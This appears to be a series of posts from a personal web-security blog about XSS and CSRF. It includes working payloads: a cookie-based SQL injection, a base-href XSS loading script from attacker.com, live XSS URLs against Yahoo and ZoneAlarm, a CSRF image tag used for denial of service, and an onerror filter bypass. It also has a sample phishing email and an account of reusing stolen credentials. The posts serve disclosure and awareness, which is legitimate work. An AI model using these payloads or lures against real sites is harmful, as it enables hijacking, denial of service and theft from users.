After reading “Thousand Ways to SQL Injection“, people started to ask me whether it is possible to launch a SQL injection using XSS? Some of them questioned me about the possiblity of it, some of them don’t even believe it’s possible. And well some of them say that’s gonna happen but don’t know how or never came accross one.

Let’s take a look at the following ‘fictive’ (and lame) scenario of SQL Injection using XSS :

As we know that site abc.com uses GoodGoodCMS_v1.0 as their Content Management System. Mr. Z, the attacker, found out that GoodGoodCMS has a XSS flaw on the admin page. But well there is nothing much to exploit since GoodGoodCMS doesn’t uses Cookies as the authentication method. But Mr. Z did found out that the GoodGoodCMS uses Cookies values in SQL Query without a proper filter.

Guess what? Mr. Z pull a XSS and insert something like this:

<script>document.cookies=”1; UPDATE admin_table SET password=\’yihaa\’ WHERE id=1″;</script>

This is my concept of SQL Injection using XSS. Correct me if I am wrong, and you are very welcome to shout your ideas about this topic here.

Thanks

Zoiz – http://zoiz.web.id

This morning I received an interesting email from webappsec.org mailing list. Amit Klein founds out that he can trigger a XSS without a <script> tag NOR inside ONE. Here is the PoC :

<html>
…
***XSS code may be embedded here***
…
<script src=”/foo/bar.js”></script>
…
</html>

The XSS is something like this :

<base href=”http://www.attacker.com/”>

And the attacker should put some JS on his host on the exact directory (ex : http://www.attacker.com/foo/bar.js). You know what happens next rite?

The coolest part of this XSS is it doesn’t even need a <script> tag or something like that. And for developers that uses / trusts blacklist approach (oranglist, greenlist, pinklist, or what ever you name it) that is usually targeting for “script”, this kind of attacks will surely bypass it.

Nice one Amit Klein

So, what is the solution? Myself suggest you not to allow your users to use HTML

Here is the Proof of Concept :

http://bbs.cn.yahoo.com/searchApplyBoard/PHNjcmlwdD5hbGVydCgiWFNTLWJ5cGFzcy1Oby1TY3JpcHQiKTwvc2NyaXB0Pg==.html

Result :

XSS on Yahoo over No-Script plugin. It’s a triple kill! I know Yahoo! is in the No-Script white-list, but I thought No-Script was supposed to block this XSS anyway. What do you think?

This might not be a new topic here, but I found out that my visitors are hardly interested with this topic. And I ever discussed this with RSnake a little bit, and he seems to be not interested too. I’ll use this article to show you the “yo” side of a browser based DDoS payloads.

If you haven’t read my previous articles, you might be interested to take a peek on them.

• Using CSRF to launch Denial Of Service, or
• CSRF on SiteMap Generator Site = Denial Of Service

The point / main purpose of using CSRF to Denial Of Service is the attacker uses your browser capability to do malicious request without you knowingly to launch a Denial Of Service to one or more targeted victims. Thus you might become the zombie computer by simply visiting a malicious site.

It’s not without prove. This morning I tried to launch a DoS to one of my site. And the result was within 5 minutes, I got a warning that telling that my site was suspended due to CPU usage exceeded. And it was down for approximately 10 minutes. And when I took a look into the log, I notice that actually this technique execute >4500 pages from my site within a few minutes. How is the payload? Here is the screenshot :

And my site was suspended as the result :

So next time you visit new sites, please take more cautious. Browse the Net using No-Script is very recommended.

Thanks!

By : Zoiz – http://zoiz.web.id
Nothing is Secure

Here the story goes :

Site ABC is an online electronic devices store. It has a search form that uses GET requests. Let say the URL to search for keyword “tv” is this : http://www.abc.com/?q=tv.

PoC :

<img src=”http://www.abc.com/?q=tv” height=”1″ width=”1″/>

Each page load from the CSRF inserted page will exhaust the targeted server load. Feedback or critics are welcomed.

ZoneAlarm is one of the most secure brands in End User Internet Security software. It’s developed by Check Point Software Technology Company. It protects over 60 million PCs from viruses, spy-wares, hackers and identity thefts. The award-winning Internet Security product line is installed in end users PCs and small businesses, protecting them from Internet threats.

Although Check Point Company provides Internet Security service, but their web system is not 100% secure at all. I have found some critical vulnerabilities even on their own official site!!

Although they are Internet Security Software developer, that protects million of PCs from viruses, hackers, and identity thefts. But they cannot even protect their own website from web application attacks. It’s already proofed today. There are some critical XSS and CSRF vulnerability found by YS.

Let me start it:

Yesterday, I visited one of an internet café to check my emails. Each computer was installed with ZoneAlarm Software. Suddenly, a small window prompt out and reminded me to update my ZoneAlarm software.

I followed the instruction and was updated the ZoneAlarm software by clicking the update button. I was brought to their update page. Suddenly, a “bad idea” came into my mind.. Hehe

“This is a internet security website, does this security website is really secure from web application attack such as XSS and CSRF?”, I asked myself.

After that, I tried to use javascript to test whether the website has an XSS vulnerability… Ding !! BIngo, ZoneAlarm XSSed!

XSS is stored on Session

XSS vulnerability on the shopping cart page:

Display Cookie using XSS

This XSS Vulnerability can be considered as critical. Because this XSS is triggered when a user trying to update ZoneAlarm software. An attacker can easiliy smuggler a trojan or a virus into the download link, and let the user download a trojan instead of ZoneAlarm Update File.

This can be done easily by combining Social Engineering and trick the victims to open a page containing the XSS. For example an attacker can forge a fake email and send it to ZoneAlarm users, and trick them to update their software through the link the attacker provided.

Dear ZoneAlarm Users,

Firstly we are very sorry to inform you that our automatic update system is currently ongoing some technical problem which will be fixed as soon as possible. By the time we are fixing the system, you are unable to update your ZoneAlarm system directly from your PC. But fortunately we you can do it by visiting the update link below to update your ZoneAlarm.

ZoneAlarm Update

We are sorry for all the inconvenience we’ve made. And thank your for your support to our product all the time. Bla3……

Other possibility is the attacker create a redirection link to trick user to download the ZoneAlarm software that has been infected by malicious program through the XSS vulnerable. After the user downloaded it, and install into his/her PC, the big trouble will be occurred such as sensitive information from the user may be stolen, damages the PC, and other problems.

Interesting XSS on the Shopping Cart Section

Based on my research, I found out the XSS is being stored on session too!! So that means the XSS vulnerability may let an attacker injects the malicious script on more pages and takes more advantages too.

I have actually reported this to the associated party, and hope that this can be fixed asap due to it’s criticality.

Bingo!!! This article has told us, “Nothing is Secure”. (Always stated by Zoiz )

——————————————————————

Notice:

I want to tell everyone first that “I’m not sure, whether those XSS vulnerability has found before or not. From my survey, I didn’t see those xss vulnerable was posted on other site until now. I have checked at XSSed.com. those XSS vulnerable that i found it’s not found at the XSSed.com too. But some other xss vulnerable on ZoneAlarm.com has been found by other people and posted at XSSed.com and it’s said Fixed already too, and it’s different to mine. Remember this article for educational purpose only.

——————————————————————

Bug Found By : YS – http://www.insecurityexposed.net
Status : Reported on 3rd April 2007, Unfixed.

I often listen to Era Baru FM Radio especially programs about Human Rights in China. Example : If you (ever or are) practicing in Falun Gong exercise in China, you’ll be arrested (jailed) by the police and punish severely. Or if you spreading information about any banned content (like Falun Gong, Liberty, etc), you also will be dealt by the local police. Even if you do a search in Baidu.com using the keyword “falun dafa”, you’ll got a temporary ban by the China Firewall. Ridiculous? (What the hell is the Internet for if the information we can have is very limited?? WtF!) If you don’t believe me, then you can try it yourself!! (Wait a moment, don’t try this first. I’ll show you an example in the story below!)

OK enough for the bullshit! Here comes the interested part where CSRF is going to play it’s role

In order to become the player in my story, first you need to open Baidu.com and search using the keyword “Zoiz” and come back to my blog asap!

Done? You got the result page right? Ok, now visit the link below :

http://zoiz.web.id/lab/csrf_againts_china_firewall.html

Ok, now open Baidu.com again and see what happened? Hehe

Don’t worry it will only last for 5 minutes and you’ll be fine later

Now you get what I mean? The point is if someone framing you onto opening an illegal link using a CSRF technique, will you be arrested? Well of course the example above will not make you go to jail, but what if the CSRF contain a RFI link to a commercial website or anything far more dangerous? What if an attacker that trick users to open a page containing this kind of CSRF and let users leave visit log everywhere to let him hide his own identity? (YS Idea )

I don’t know the answer, and I’ll just point it out and let you guys discuss about this This story tells us to be more careful the next time you are browsing the internet.

If you are using Mozilla Firefox, I can recommend you 2 plugins that may lessen the risk from being harm from this kind of attack. The first one is No-Script plugin, which will block all script from running. And the second one is FireKeeper, which will alert you whenever there’s malicious code running and ban malicious site.

That’s all folks!

For those who doesn’t know how to change user agent information :

To change the User Agent string, just enter about:config as an address in the address bar of FireFox,  Now press the right mouse button to get the context menu and select “String” from the menu entry “New”. Enter the preference name “general.useragent.override”, without the quotes. Next, enter the new User Agent value you want Mozilla Firefox to use. (You can also use a FireFox plugin to do this)

This is where the XSS (Cross Site Scripting) play the role. You might enter this :

<script>alert(/XSS/);</script>

And visit the page you wanted to test, and see what happen

Here is an example vulnerable site for you : http://www.quirksmode.org/js/detect.html

The problem lies within a password, a default password. Yes, the default password problem do exists on custom CMS! If you are still confuse of what I am talking about, I’ll give a REAL LIFE case, but of course I’ll will not mention the vulnerable sites. I’ll use example site name instead.

Here the story goes :

Let’s say Company X is a group of professional web developers. They have been developing web system for years and are well experienced. Let’s assume that they have developed 30 sites so far.

And Mr. Z, the attacker is eager to own site V, one of Company X customer.

And so Mr. Z went to site V to take a deep look. But the result shows no significant bugs found. And so he took another approach to try his luck. He went to Company X site and listed all their customers sites. He found out one of their customers site, site Y had a critical SQL Injection vulnerability. He exploited the site until he got all the users Login ID and passwords.

Then he went to site V again, and use the Login ID and passwords from site Y and try to log in to site V. Miracle happened, he successfully logged in to site V administration control panel. He owned site V through site Y.

This is a true story, and happened in our real life. Some web developer companies have some kind of default password for all sites that they developed. I am not sure what is the real purpose, but as my conclusion is that they are too LAZY to remember all the passwords. Because of this bad habits, sometimes mass hacking occurs.

I write this article isn’t base on no proofs, I ever owned dozen of sites with a single user name and password just like the story above. But I never damage or deface them, it’s not an ethical act to me.

And my advice to you is, if you are a web developer don’t take this bad habit or ready to be owned! 

<img src=”http://zoiz.web.id/fotoku.jpg” width=”10″ height=”10″ onerror=”window.location.href=’http:/zoiz.web.id’;”>

The method is the same as my Pop Up Method, it triggered javascript inside image error handler hence it bypasses javascript filter. This apply to sites that allow users to post image on their comments.

By : Zoiz [at] http://zoiz.web.id
Nothing is Secure